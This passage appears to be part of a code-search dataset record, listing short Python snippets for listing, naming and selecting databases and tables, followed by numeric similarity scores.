Database doesn't declare that it implements\n # IDatabase.\n if not ZODB.interfaces.IDatabase.providedBy(db):\n zope.interface.directlyProvides(db, ZODB.interfaces.IDatabase)\n zope.component.provideUtility(db, ZODB.interfaces.IDatabase, name)\n db.setActivityMonitor(ZODB.ActivityMonitor.ActivityMonitor())\n result.append(db)\n\n return result, databases", "def database(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"database\")", "def db(self) -> str:\n return self._db", "def valid_datastores(cls):\n\n dblist = os.listdir(DATASTORE_DIR)\n return dblist", "def list_tables(self, **kwargs):\n cursor = self.execute(\n self.list_tables_sql, dict({\"database\": self.uri.database}, **kwargs)\n )\n return [row[0] for row in cursor.fetchall()]", "def _get_database(self, options):\n database_key = options.get('database')\n if not database_key:\n if len(settings.DATABASES) >= 2:\n errmsg = \"Because this project contains more than one database, you\"\n errmsg += \" must specify the --database option.\"\n raise CommandError(errmsg)\n database_key = settings.DATABASES.keys()[0]\n return settings.DATABASES[database_key]", "def stores(self):\n sql = u\"SELECT name FROM `sqlite_master` WHERE type='table'\"\n rows = self.conn.execute(sql)\n return [r['name'] for r in rows\n if r['name'] not in self.invalid_names]", "def databases(self, databases):\n\n self._databases = databases", "def getDatabaseName(self):\n return f\"n{self.name.capitalize()}\"", "def database_name(self):\n try:\n return self._database_name\n except:\n pass\n\n if 'X-UnitTest' in self.request.headers:\n if self.request.headers['X-UnitTest'] == 'True':\n self._database_name = TEST_DATABASE\n return TEST_DATABASE\n default_database = self.application.databases['default']['NAME']\n self._database_name = default_database\n return default_database", "def fetchall(self, databaseName):\n pass", "def get_tables(self, db_name):\n pass", "def full_schema_list(self, schema: str) -> List[str]:\n # Generate the information_schema identifier for that database\n # in order to be able to filter it out\n name_parts = schema.split(\".\")\n\n info_schema = f\"{name_parts[0]}.information_schema\"\n\n fetched_schemas = []\n\n # All Schemas\n if name_parts[1] == \"*\":\n db_schemas = self.show_schemas(name_parts[0])\n for db_schema in db_schemas:\n if db_schema != info_schema:\n fetched_schemas.append(db_schema)\n\n # Prefix schema match\n elif \"*\" in name_parts[1]:\n db_schemas = self.show_schemas(name_parts[0])\n for db_schema in db_schemas:\n schema_name = db_schema.split(\".\", 1)[1].lower()\n if schema_name.startswith(name_parts[1].split(\"*\", 1)[0]):\n fetched_schemas.append(db_schema)\n\n # TODO Handle more complicated matches\n\n else:\n # If no * in name, then return provided schema name\n fetched_schemas = [schema]\n\n return fetched_schemas", "def AddDatabaseList(parser, help_text, required=False):\n if required:\n group = parser.add_group(mutex=False, required=True)\n group.add_argument(\n '--database',\n '-d',\n type=arg_parsers.ArgList(min_length=1),\n metavar='DATABASE',\n help=help_text,\n )\n else:\n parser.add_argument(\n '--database',\n '-d',\n type=arg_parsers.ArgList(min_length=1),\n metavar='DATABASE',\n required=False,\n help=help_text,\n )", "def get_settings_variables(all_tables):\r\n tables_list = [tables.table_name for tables in all_tables]\r\n\r\n database_list = []\r\n for tables in tables_list:\r\n for table in tables:\r\n if \"_db\" in table and \"_db_copy\" not in table:\r\n 
database_list.append(DatabaseTables(table))\r\n\r\n return database_list", "def listAll(self):\n red = self.dbConnect()\n return red.keys()", "def database(self) -> str:\n\t\treturn os.getenv('APP_DATABASE', 'memory').lower()", "def linked_databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LinkedDatabaseArgs']]]]:\n return pulumi.get(self, \"linked_databases\")", "def get_all_db_zone(self, context):\n zone_objs = self.dns_manager.get_all_db_zone(context)\n return zone_objs", "def id_chooser(query, ident):\n\n return [\"db1\", \"db2\"]", "def check_name_db ():\n db_checks = [DB_FIRST_MALE, DB_FIRST_FEMALE,\n DB_LAST_SIMPLE, DB_LAST_NAMESON,\n DB_LAST_GAELIC1, DB_LAST_GAELIC2,\n DB_LAST_COMBO1, DB_LAST_COMBO2,\n DB_LAST_UPPER1, DB_LAST_UPPER2]\n\n db_exists = db.database_exists\n for db_name in db_checks:\n if not db_exists(db_name):\n raise DatabaseException, db_name", "def uses_database(self, dbname):\n used = False\n if any([dbname.upper() in y for y in [x.upper() for x in self._dbnames]]):\n used = True\n return used" ]
[ "0.80087274", "0.78206784", "0.77191776", "0.7642941", "0.7639768", "0.7624062", "0.7575778", "0.75723255", "0.7553429", "0.75302035", "0.752453", "0.73743457", "0.7372475", "0.72860897", "0.7283433", "0.7283433", "0.72620213", "0.72427213", "0.72408473", "0.7234212", "0.72252375", "0.7220864", "0.7090598", "0.69247746", "0.6915141", "0.68485975", "0.6818625", "0.67999864", "0.67560005", "0.67220056", "0.6714476", "0.6704931", "0.6681987", "0.6660493", "0.65807754", "0.6569512", "0.656041", "0.65442556", "0.65299577", "0.6447874", "0.6441716", "0.6435395", "0.6417968", "0.63947767", "0.63895106", "0.6366546", "0.6360786", "0.63561803", "0.6351629", "0.6349783", "0.6308776", "0.6272326", "0.62390554", "0.620215", "0.62008715", "0.6175755", "0.6127445", "0.6071253", "0.60654277", "0.60629445", "0.60550505", "0.60541666", "0.6041342", "0.6000453", "0.5951903", "0.5950415", "0.59172505", "0.5898623", "0.58954096", "0.5892437", "0.5890969", "0.5880231", "0.5870215", "0.58657146", "0.58552355", "0.584718", "0.581554", "0.5803168", "0.579759", "0.57637805", "0.5739197", "0.57236344", "0.5697776", "0.5686654", "0.5684148", "0.56814045", "0.5667741", "0.5667477", "0.5665535", "0.5661384", "0.56601596", "0.5652312", "0.56444377", "0.56317455", "0.56260234", "0.5613368", "0.56119895", "0.56022704", "0.5593381", "0.5588735" ]
0.6749918
29
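As with the previous record, the positive document here ("List of database names") is an empty stub. A hedged sketch of one possible completion, again assuming SQLite and using purely illustrative names: PRAGMA database_list reports every database visible on a connection as (seq, name, file) rows, so the name column gives the list.

import sqlite3

def make_database_names_list(db_path):
    # Hypothetical completion: list the database names visible on a
    # SQLite connection ('main', 'temp', plus any ATTACHed databases).
    conn = sqlite3.connect(db_path)
    try:
        return [row[1] for row in conn.execute("PRAGMA database_list")]
    finally:
        conn.close()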
makeList generalized to use the boolean function f.
def makeListF(f, url, *argsf, caseSensitive = False, wildCards = True):
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_bool(bool_list):\n new_list = []\n for lst in bool_list:\n for item in lst:\n new_list.append(item)\n if True in new_list:\n return True\n else:\n return False", "def get_list_of_bool2(self):\n pass", "def build():\n return [5,2,1,3,6] # true\n return [5,2,6,1,3] # false", "def convertToDiscreteFunctionList(boolean: bool) -> cern.japc.value.DiscreteFunctionList:\n ...", "def __convert_boolean_list(boolean_list):\n return ['0' if b else '1' for b in boolean_list]", "def filter_list(f):\n\n def new_function(*args: Union[List[Tuple[str, bool]], Any], **kwargs: Any):\n try:\n return '\\n'.join([file for file, is_saved in\n {k: v for d in f(*args, **kwargs)\n for k, v in d.items()}.items() if not is_saved])\n except AttributeError:\n return ''\n\n return new_function", "def fizz_buzz_using_boolean():\n fizz_buzz_list = []\n\n for x in range(1, 101): \n\n fizz = x % 3 == 0 \n buzz = x % 5 == 0\n \n if fizz and buzz: \n fizz_buzz_list.append('fizzbuzz')\n continue\n elif fizz: \n fizz_buzz_list.append('fizz')\n continue\n elif buzz: \n fizz_buzz_list.append('buzz')\n continue\n else: \n fizz_buzz_list.append(x) \n\n return fizz_buzz_list", "def simple_filter(f, l):\n # a list comprehension with an 'if' clause goes the job nicely\n return [ item for item in l if f(item) ]", "def filter(function, iterable):\n\n if function is bool:\n return [x for x in iterable if x]\n\n return [x for x in iterable if function(x)]", "def to_list(f):\n @functools.wraps(f)\n def wrapper(*args, **kwargs):\n return list(f(*args, **kwargs))\n return wrapper", "def simple_filter_2(f, l):\n # alternative implementation: the same as above, but without comprehension.\n filtered_l = []\n for item in l:\n if f(item):\n filtered_l.append(item)\n return filtered_l\n # I think the list comprehension is not only shorter, but also more\n # readable.", "def make_removal_bool(*bools):\n return(np.invert([np.any(f) for f in zip(*bools)]))", "def make_bool(value):\n def make_value():\n return verify.Term(verify.BOOLEAN, value)\n return make_value", "def boollist(lst):\n return (', '.join(map(lambda x: str(bool(x)), lst))).lower()", "def convertToBooleanArray(booleanArray: typing.List[bool]) -> typing.List[bool]:\n ...", "def my_filter(function,lst):\n return list(x for x in lst if function(x))", "def add_bools(list_of_lists):\n l = []\n def count(recursive):\n l.append(1)\n for child in recursive:\n if isinstance(child, list):\n count(child)\n count(list_of_lists)\n return st.tuples(st.just(list_of_lists), st.tuples(*[st.sampled_from([True, False]) for i in l]))", "def ft_filter(function_to_apply, list_of_inputs):\n if not callable(function_to_apply):\n exit(\"First param should be a Function\")\n try:\n object_iter = iter(list_of_inputs)\n except TypeError:\n exit(\"Second Argument must be iterable\")\n lst = []\n for item in list_of_inputs:\n if function_to_apply(item) == True: \n lst.append(item)\n return lst", "def predicate(f):\n wrapper = Predicate(f)\n update_wrapper(wrapper, f)\n return wrapper", "def satisfiesF(L):\n # Your function implementation here\n fS = []\n newL = []\n for element in L:\n fS.append(f(element))\n\n for idx in range(len(fS)):\n if not fS[idx]:\n L[idx] = '!@#'\n\n for idx in range(len(L)):\n try:\n L.remove('!@#')\n except:\n break;\n\n return len(L)", "def make_lists(sv):\r\n \r\n mark_delayed(sv) # identify delayed objects\r\n make_pin_list(sv) # detect and initialize inputs (to false) \r\n make_old_list(sv) # create a list of used old/old \r", "def test_roundtrip_list():\n assert [True, 
False, True, False, True] == (\n List(Boolean).read(\n List(Boolean).to_bytes(\n [True, False, True, False, True]))\n )", "def check_for_list(check):", "def Listor(fun):\n @functools.wraps(fun)\n def inside(*args, **kwargs):\n return list(fun(*args, **kwargs))\n return inside", "def eval_f(f, xs):\n l = []\n for x in xs:\n l.append(f(x))\n return l", "def makelist(count, lista):\n if count <= 8:\n return makelist(count+1, lista+[(int(input()))])\n print(*list(filter(lambda x: x%2 == 0, lista)))", "def custom_filter(some_func, iterator_list):\n\n local_iterator = from_input_to_list(iterator_list)\n func_map = [some_func(i) for i in local_iterator]\n true_list = [j for j in func_map if j > 100] # here we can hardcode any condition\n\n return true_list", "def _maplist_vm(vm, f, xs):\n def f_(*args):\n return vm.call(f, args)\n return list(map(f_, xs))", "def generateLists(a, b, p):\n list_of_listings = []\n chk_nums = []\n for i in range(2, b-a+1):\n if prime_test(i,p):\n chk_nums.append(i)\n for i in chk_nums:\n listing = []\n for j in range(a, b+1):\n if j % i == 0:\n listing.append(j)\n list_of_listings.append(listing)\n final_list = []\n for listing in list_of_listings:\n if len(listing) > 1:\n final_list.append(listing)\n return final_list", "def lift(f):\n @wraps(f)\n def inner(value):\n result = f(value)\n return SuperBool(result, f.__doc__) if not isinstance(result, SuperBool) else result\n return inner", "def to_list(a, args):\n if args.filter(follow=a).exists():\n exists = True\n else:\n exists = False\n return exists", "def boolean_func(experiment):", "def split(func, iterable):\n falsy, truthy = [], []\n for e in iterable:\n if func(e):\n truthy.append(e)\n else:\n falsy.append(e)\n return tuple(falsy), tuple(truthy)", "def list_generalizer(f):\n @functools.wraps(f)\n def wrapped(data, *args, **kwargs):\n if type(data) == list:\n return [f(d, *args, **kwargs) for d in data]\n else:\n return f(data, *args, **kwargs)\n\n return wrapped", "def simple_map(f, l):\n # Again, my first take is a list comprehension.\n return [ f(item) for item in l ]", "def maplist(f, xs):\n return list(map(f, xs))", "def visit_list(self, list_to_visit: list, symbol_table: SymbolTable) -> Number:\n passed_cases = []\n for node in list_to_visit:\n result = self.visit(node, symbol_table)\n passed_cases.append(result)\n\n if False in [num.value == 1 for num in passed_cases]:\n return self.symbol_table[\"false\"]\n else:\n return self.symbol_table[\"true\"]", "def generate_boolean_vector(f,q,r,DIMS):\n b = None\n for i in range(DIMS):\n if b is None:\n b = (f[:,i]<q[i]+r[i]) & (f[:,i]>q[i])\n else :\n b = b & (f[:,i]<q[i]+r[i]) & (f[:,i]>q[i])\n return b", "def filter_generic(mt_list, func):\r\n return [mt for mt in mt_list if func(mt)]", "def all(self, *args, **kwargs):\n if len(args):\n func = args[0]\n args = args[1:]\n else:\n func = bool\n for x in self:\n if not func(x, *args, **kwargs):\n return plist()\n return self", "def __init__(self):\n self.b = [False] * 10", "def existing_and_newer_list(fn0_l, fn):\n\n rs = [existing_and_newer(fn0, fn) for fn0 in fn0_l]\n some_false = False in rs\n return not some_false", "def _clean_simple_type_list(value_list: list[Any]) -> list[Any]:\n for i in range(len(value_list)):\n if isinstance(value_list[i], str):\n lower_case_value = value_list[i].lower()\n if lower_case_value == \"true\":\n value_list[i] = True\n if lower_case_value == \"false\":\n value_list[i] = False\n return value_list", "def generate_list(self):\n\n array = [False] * 25\n bits = 
self.generate_bits()\n\n for column in range(2, -1, -1):\n for row in range(0, 5):\n bit = next(bits)\n\n array[column + (row * 5)] = bit\n array[(4 - column) + (row * 5)] = bit\n\n return array", "def boolean(\n function: Callable[..., celpy.celtypes.Value]) -> Callable[..., celpy.celtypes.BoolType]:\n @wraps(function)\n def bool_function(a: celpy.celtypes.Value, b: celpy.celtypes.Value) -> celpy.celtypes.BoolType:\n result = function(a, b)\n if result == NotImplemented:\n return cast(celpy.celtypes.BoolType, result)\n return celpy.celtypes.BoolType(bool(result))\n return bool_function", "def filterfalse(iterable, predicate):\n for x in iterable:\n if not predicate(x):\n yield x", "def cfilter(func,iterable):\n result = []\n\n for i in iterable:\n\n if func(i) == True:\n result.append(i)\n\n return result", "def prime_numbers_determination_list(n: int)-> List[bool]:\r\n is_prime = [True] * (n + 1)\r\n is_prime[0] = is_prime[1] = False\r\n\r\n for i in range(2, int(math.sqrt(n)+1)):\r\n if is_prime[i]:\r\n for j in range(i*2, n+1, i):\r\n is_prime[j] = False\r\n return is_prime", "def conj(fs):\n def feature(s, i):\n return all(f(s, i) for f in fs)\n return feature", "def _lst_of_tpls(step, parsing_function, filt=None):\n lst = []\n for key in step:\n if step[key][0]: # On/Off flag\n if len(step[key]) > 1:\n content_d = step[key][1]\n content_vals = list(values_iterator(content_d))\n for ll in modified_cartesian(*map(ensure_list, content_vals)):\n content = dict(zip(list(content_d), ll))\n if filt is not None and filt(content):\n continue\n lst.append(parsing_function(key, content))\n else:\n lst.append(parsing_function(key, {}))\n return lst", "def get_boolean_array_from(number: int) -> List[bool]:\n return_value = [False] * MAX_BIT_LENGTH\n last_bit_position = len(bin(number)) - 1\n for i in range(0, last_bit_position):\n return_value[i] = (number & (1 << i)) != 0\n return return_value", "def creates(f):\n f.creates = True\n return f", "def set_bools(self, value, bools, limit):\n for x in range(limit):\n if value & 1 << x:\n bools[x]['value'] = True\n else:\n bools[x]['value'] = False\n pass", "def gen_list_gt(lst, no):\r\n #syntax: [ item for item in lst if_condition ]\r\n return [ item for item in lst if item > no ]", "def test_listlist_op_1():\n\n @ops.listlist_op\n def f(x):\n return [4, 5, 6]\n\n result = f([1, 2, 3]) # Passing in a list, as expected\n\n assert(isinstance(result, list)), f\"{result}\"\n assert(result == [4, 5, 6])", "def sequence(f, lst: list) -> list:\n ret = []\n for ele in lst:\n ret.append(f(ele))\n return ret", "def test_if_false_elimination():\n\n class Falsy:\n def __bool__(self):\n # For Python 3\n return False\n\n false_values = [0, \"\", [], {}, set(), False, None, Falsy()]\n assert not any(false_values)\n\n def f_if():\n if x:\n print(\"x is True\")\n\n for x in false_values:\n check_component(\n prune_cfg,\n f_if,\n additional_bindings=dict(x=x),\n expected_source=\"\"\"\n def f_if():\n pass\n \"\"\",\n )\n\n def f_if_else():\n if x:\n print(\"x is True\")\n else:\n print(\"x is False\")\n\n check_component(\n prune_cfg,\n f_if_else,\n additional_bindings=dict(x=False),\n expected_source=\"\"\"\n def f_if_else():\n print(\"x is False\")\n \"\"\",\n )", "def filter(self, func: Callable[[T], bool]) -> 'List[T]':\n return [v for v in self.array if func(v)]", "def satisfiesF(L):\n # Your function implementation here\n i = 0\n while i < len(L):\n if not f(L[i]):\n L.remove(L[i])\n else:\n i += 1\n return len(L)", "def false(func):\n return 
MultipleChoice(_text_from_func(func), Answer('False'), Answer('True'), is_code=True)", "def every(lst, fn):\n return reduce(lambda acc, elem: acc and fn(elem), lst, True)", "def split_cond(f, iterable):\n split_point = [i for i, e in enumerate(iterable) if f(e)]\n split_point += [len(iterable)]\n return [iterable[i:j] for i, j in zip(split_point[:-1], split_point[1:])]", "def filter_(f: Callable[[A], Maybe[bool]], iterable: Iterable[A]\n ) -> Maybe[Iterable[A]]:\n return cast(Maybe[Iterable[A]], filter_m_(Just, f, iterable))", "def listify(fn=None, wrapper=list):\n\n def listify_return(fn):\n @functools.wraps(fn)\n def listify_helper(*args, **kw):\n return wrapper(fn(*args, **kw))\n\n return listify_helper\n\n if fn is None:\n return listify_return\n return listify_return(fn)", "def getBooleanArray2D(self) -> typing.List[typing.List[bool]]:\n ...", "def true_false_both_filter(request, items, parameter):\n if parameter in request['args']:\n test = request['args'][parameter].lower()\n if test == 'true':\n items = [item for item in items if item[parameter]]\n elif test == 'false':\n items = [item for item in items if not item[parameter]]\n elif test == 'both':\n # Otherwise return both true and false values\n pass\n else:\n raise UserException(ERROR_TRUE_FALSE_BOTH_REQUIRED % parameter)\n\n return items", "def piecewise(x, condlist, funclist, *args, **kw):\n x = asanyarray(x)\n n2 = len(funclist)\n if isscalar(condlist) or \\\n not (isinstance(condlist[0], list) or\n isinstance(condlist[0], ndarray)):\n condlist = [condlist]\n condlist = [asarray(c, dtype=bool) for c in condlist]\n n = len(condlist)\n if n == n2-1: # compute the \"otherwise\" condition.\n totlist = condlist[0]\n for k in range(1, n):\n totlist |= condlist[k]\n condlist.append(~totlist)\n n += 1\n if (n != n2):\n raise ValueError, \"function list and condition list \" \\\n \"must be the same\"\n\n zerod = False\n # This is a hack to work around problems with NumPy's\n # handling of 0-d arrays and boolean indexing with\n # numpy.bool_ scalars\n if x.ndim == 0:\n x = x[None]\n zerod = True\n newcondlist = []\n for k in range(n):\n if condlist[k].ndim == 0:\n condition = condlist[k][None]\n else:\n condition = condlist[k]\n newcondlist.append(condition)\n condlist = newcondlist\n\n y = zeros(x.shape, x.dtype)\n for k in range(n):\n item = funclist[k]\n if not callable(item):\n y[condlist[k]] = item\n else:\n y[condlist[k]] = item(x[condlist[k]], *args, **kw)\n return y", "def f1(a, b): \n if a == False and b == True:\n return True\n else:\n return False", "def iff(bool,trueValue,falseValue):\n if bool:\n return trueValue\n else:\n return falseValue", "def get_list_bool_from_string(input_string):\n for text in [\"[\", \"]\", \" \"]:\n input_string = input_string.replace(text,\"\")\n list_of_strings = input_string.strip().split(\",\")\n list_bool = [True if item==\"True\" else False for item in list_of_strings]\n return list_bool", "def __init__(self):\n self.li=[[False *100000] for i in range(100000)]", "def partition(is_included_fn, items):\n item_by_exclusion = { True : [], False : [] }\n for item in items:\n # \"not\" to normalise all values to either True or False\n item_by_exclusion[not is_included_fn(item)].append(item)\n return (item_by_exclusion[False], item_by_exclusion[True])", "def convertToFloatArray(booleanArray: typing.List[bool]) -> typing.List[float]:\n ...", "def createFlagList(self):\n flag_list = QListWidget()\n for key in self.flags.keys():\n flag_item = QListWidgetItem()\n flag_item.setText(key)\n 
flag_item.setFlags(Qt.ItemIsUserCheckable | Qt.ItemIsEnabled)\n flag_item.setCheckState(Qt.Unchecked)\n flag_list.addItem(flag_item)\n\n flag_list.itemClicked.connect(self.flagEnable)\n return flag_list", "def filter(self, ffun):\n # BEGIN\n lst = []\n for item in WordSet(self.text).words():\n # if len(item) == len(ffun):\n # lst.append(item)\n if ffun(item) == True:\n lst.append(item)\n return lst\n\n # END", "def make_boolean(value):\n if value == '1':\n return True\n return False", "def test_if_true():\n\n true_values = [True, 1, 2.0, object(), \"foo\", int]\n assert all(true_values)\n\n def f_if():\n if x:\n print(\"x is True\")\n\n for x in true_values:\n check_component(\n prune_cfg,\n f_if,\n additional_bindings=dict(x=x),\n expected_source=\"\"\"\n def f_if():\n print('x is True')\n \"\"\",\n )\n\n def f_if_else():\n if x:\n print(\"x is True\")\n else:\n print(\"x is False\")\n\n check_component(\n prune_cfg,\n f_if_else,\n additional_bindings=dict(x=2),\n expected_source=\"\"\"\n def f_if_else():\n print(\"x is True\")\n \"\"\",\n )", "def true(func):\n return MultipleChoice(_text_from_func(func), Answer('True'), Answer('False'), is_code=True)", "def visit_true(self) -> T:", "def post_processing(f,param_dict):\r\n must_have = param_dict['must_have']\r\n cannot_be_together = param_dict['cannot_be_together']\r\n\r\n # must have \r\n tmp = list()\r\n for itemset in f:\r\n if set(itemset).intersection(set(must_have)): \r\n tmp.append(itemset)\r\n\r\n f = tmp[:]\r\n\r\n # cannot be together\r\n for itemset in f:\r\n for cbt in cannot_be_together:\r\n if set(cbt) <= set(itemset):\r\n tmp.remove(itemset)\r\n \r\n return tmp", "def listFlag(flaglist):\n flag = 0\n for index, item in enumerate(flaglist):\n flag = setFlag(flag, index, item)\n return flag", "def convert_falselike_to_bool(input_item, convert_int=False, convert_float=False):\n list_False_items = [False, \"False\", \"false\", \"FALSE\", \"F\", \"f\", \"falsch\", \"FALSCH\", \"valse\", \"lažna\", \"fals\",\n \"NEPRAVDA\", \"falsk\", \"vals\", \"faux\", \"pa vre\", \"tsis tseeb\", \"hamis\", \"palsu\", \"uongo\", \"ngeb\",\n \"viltus\", \"klaidinga\", \"falz\", \"falso\", \"USANN\", \"wartosc false\", \"falošné\", \"falskt\", \"yanlis\",\n \"sai\", \"ffug\", \"VALSE\", \"LAŽNA\", \"FALS\", \"FALSK\", \"VALS\", \"FAUX\", \"PA VRE\", \"TSIS TSEEB\",\n \"HAMIS\", \"PALSU\", \"UONGO\", \"NGEB\", \"VILTUS\", \"KLAIDINGA\", \"FALZ\", \"FALSO\", \"WARTOSC FALSE\",\n \"FALOŠNÉ\", \"FALSKT\", \"YANLIS\", \"SAI\", \"FFUG\"]\n\n # if you want to accept 0 or 0.0 as a false value, add it to the list\n if convert_int:\n list_False_items += [0, \"0\"]\n if convert_float:\n list_False_items += [0.0, \"0.0\"]\n # return boolean False if the input item is in the list. 
If not, return the original input_item\n return_value = False if input_item in list_False_items else input_item\n\n return return_value", "def enf_filelist(filelist, extension = None):\n\n new_filelist = None\n\n if isinstance(filelist, str):\n if os.path.isdir(filelist):\n new_filelist = list_files(False, filelist, False, False)\n\n elif os.path.isfile(filelist):\n new_filelist = [filelist]\n\n elif isinstance(filelist, bool):\n print 'Expected file list or directory but received boolean or None type input!'\n return False\n elif isinstance(filelist, list):\n new_filelist = filelist\n\n\n if new_filelist is None:\n new_filelist = filelist\n\n if extension is not None:\n\n for new_file in new_filelist:\n\n if extension not in new_file:\n new_filelist.remove(new_file)\n\n return new_filelist", "def _BoolsToInts(arg_list):\n result = []\n for arg in arg_list:\n if isinstance(arg, (list, tuple)):\n result.append(_BoolsToInts(arg))\n elif arg is True:\n result.append(1)\n elif arg is False:\n result.append(0)\n else:\n result.append(arg)\n\n return result", "def visit_false(self) -> T:", "def map(self, f):\n if self.is_empty():\n pass\n else:\n items = []\n items.append(f(self._first))\n map(f._rest)\n new_lst = LinkedListRec(items)", "def make_list(self, a, b, LIMIT):\n\t\tprint \"I just made a list\"\n\t\tlist_a_b = []\n\t\tfor i in range(a,b + 1):\n\t\t\tif (i % 2 != 0 and i < LIMIT):\n\t\t\t\tlist_a_b.append(i)\n\t\treturn list_a_b", "def none(self, *args, **kwargs):\n if len(args):\n func = args[0]\n args = args[1:]\n else:\n func = bool\n for x in self:\n if func(x, *args, **kwargs):\n return plist()\n return self", "def any(self, *args, **kwargs):\n if len(args):\n func = args[0]\n args = args[1:]\n else:\n func = bool\n for x in self:\n if func(x, *args, **kwargs):\n return self\n return plist()", "def convertToStringArray(booleanArray: typing.List[bool]) -> typing.List[str]:\n ...", "def TransformFlags(self) -> _n_2_t_0[bool]:", "def generate_train(n: int, case: Case) -> List[bool]:\n if case is Case.Random:\n return [bool(randint(0, 1)) for _ in range(n)]\n elif case is Case.AllOn:\n return [True for _ in range(n)]\n elif case is Case.AllOffButStart:\n return [True] + [False for _ in range(n - 1)]", "def simple_map_2(f, l):\n # Same as above without comprehension:\n mapped_l = []\n for item in l:\n mapped_l.append( f(item) ) # the extra blanks are just for readability\n return mapped_l", "def custom_filter(function, iterable):\n map_list = []\n\n for i in iterable:\n if function(i):\n map_list.append(i)\n\n return map_list", "def _make_zero(p):\n\n return [pi == 0 for pi in p]", "def truth_values(formula: Formula, models: Iterable[Model]) -> Iterable[bool]:\n # Task 2.3\n arr = []\n for model in models:\n arr.append(evaluate(formula, model))\n return arr", "def map(self, f: Callable[[Any], Any]) -> RecursiveList:\n # If empty, return empty list\n if self.is_empty():\n return RecursiveList([])\n else:\n # Apply f to the first element and make a new list to return\n rl = RecursiveList([f(self._first)])\n # Map the rest of the list and set it to rl's _rest\n rl._rest = self._rest.map(f) # recursive call\n return rl", "def subset(mylist,mybool):\n myarray = np.array(mylist)\n return(np.squeeze(myarray.take(np.where(mybool),axis=0)))", "def condition_for_function(f, abi, all_not_in_ABI):\n\n\tcondition = []\n\tfor n in f.entry_points:\n\t\t[category, num] = api.get_category_for_name( n )\n\t\tif category not in abi:\n\t\t\tcondition.append( 'defined(need_%s)' % (gl_XML.real_category_name( 
category )) )\n\t\telif all_not_in_ABI:\n\t\t\treturn []\n\n\treturn condition", "def unbool(element, true=object(), false=object()):\r\n\r\n if element is True:\r\n return true\r\n elif element is False:\r\n return false\r\n return element" ]
[ "0.63551515", "0.63446385", "0.6126535", "0.5955366", "0.5880952", "0.5871879", "0.58662516", "0.5822809", "0.57801163", "0.5777717", "0.5704812", "0.56913203", "0.55946165", "0.55707604", "0.55597055", "0.5552575", "0.55456346", "0.55446935", "0.5511639", "0.54347694", "0.54155916", "0.5350729", "0.5329134", "0.5305977", "0.52911603", "0.5270238", "0.525476", "0.5248569", "0.52472484", "0.52467495", "0.52444065", "0.5191356", "0.5190649", "0.5158934", "0.5153904", "0.51525056", "0.5151617", "0.5131768", "0.5116737", "0.51079845", "0.50913465", "0.5070372", "0.5066828", "0.50612557", "0.5040858", "0.5038232", "0.5037023", "0.50333303", "0.5027547", "0.50234747", "0.50230527", "0.4982338", "0.49817693", "0.49744558", "0.49736163", "0.49582025", "0.4957356", "0.49549353", "0.49372736", "0.49304834", "0.49270585", "0.49266693", "0.49183035", "0.4909277", "0.4908612", "0.49008018", "0.48877928", "0.4887385", "0.4881374", "0.4880783", "0.48771778", "0.48736235", "0.48641562", "0.48527446", "0.4851805", "0.4847717", "0.48449853", "0.48448285", "0.48426542", "0.48344308", "0.48339203", "0.48337957", "0.4831885", "0.48195833", "0.47981602", "0.4796928", "0.47963744", "0.47817478", "0.47678012", "0.47665483", "0.47645396", "0.47592098", "0.47475472", "0.4744578", "0.47420242", "0.473606", "0.47270757", "0.47267133", "0.47180665", "0.4716183" ]
0.56456155
12
returns list of characters that appear in any username
def userNameCharacters(url, tableName, caseSensitive = False, wildCards = True):
    """
    sqlzoo characters
    ['a', 'c', 'd', 'e', 'h', 'i', 'j', 'k', 'n', 'o', 'p', 'r', 't', 'w', '_', '%']
    """
    lst = []
    for ch in special:
        if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
            lst.append(ch)
    for ch in lower:
        if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
            lst.append(ch)
    for ch in numbers:
        if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
            lst.append(ch)
    for ch in other:
        if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
            lst.append(ch)
    if(caseSensitive):
        for ch in upper:
            if(checkUsernameCharacter(ch, url, tableName, notLike = False, notLikeName = "", index = "no index")):
                lst.append(ch)
    if(wildCards):
        for ch in wildcards:
            lst.append(ch)  # it'll match if there's users
    return lst
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def all_users():\n\treturn [unicode(name[:-4]).lower() for name in os.listdir(os.path.join(WORLD_DIR, 'players'))]", "def check_user_name(self, username):\n usernames = []\n for user in self.__users:\n if user['username'] == username:\n usernames.append(user)\n return usernames", "def check_username(username):\n if username:\n if not re.match('[a-z]', username[0]):\n return ['username_error_badfirstchar']\n # Technically both these conditions might hold. However, the common\n # case seems to be that somebody starts typing their name beginning\n # with an upper-case letter, and it's probably sufficient to just\n # issue the first error in that case.\n elif not re.match('^[-a-z0-9_]+$', username):\n return ['username_error_badchar']\n return []", "def checkUsernameSequences(n, ch, url, tableName, minLen = 1, maxLen = 2):\n if(minLen == 1):\n strLst = ch\n # assumes all of ch is a match\n else:\n strLst = []\n for k in range(minLen, maxLen + 1):\n lst = generateSubSequences(k, ch)\n sublst = [x for x in lst if userNameLike(x, url, tableName)]\n# list comprehensions with conditions:\n# https://stackoverflow.com/questions/6475314/python-for-in-loop-preceded-by-a-variable\n strLst += sublst\n return strLst", "def containing(letter, text):\n return([word for word in text if word.count(letter) >= 1])", "def clean_user_input(self, user_input):\n legal_chars = re.compile(r'^[a-z0-9]$')\n return filter(lambda c: re.match(legal_chars, c), user_input.lower())", "def find_single_letters(question):\n if re.findall(r\"\\bletter\\b|\\bletters\\b\", question):\n matches = re.findall(r\"\\b[A-Za-z]\\b\", question)\n\n return [m for m in matches]\n\n return []", "def filt(seq, lst):\n regex = \"(\" + \")|(\".join(seq) + \")\"\n regex = re.compile(regex)\n slst = list(filter(regex.search, lst))\n return slst\n\n\n # still need a checkUsername function ", "def chars(self, irc, msg, args, channel, username):\n if not self.registryValue('full_access', channel):\n irc.reply('Concord denies you access on this channel!')\n return\n\n user = self._sql(\"\"\"\n SELECT * FROM accounting_capsuler\n WHERE username=%s\"\"\", [username])\n if not user:\n irc.error('Could not find user \"{0}\"'.format(username))\n return\n\n chars = self._sql(\"\"\"\n SELECT * FROM character_charactersheet\n WHERE 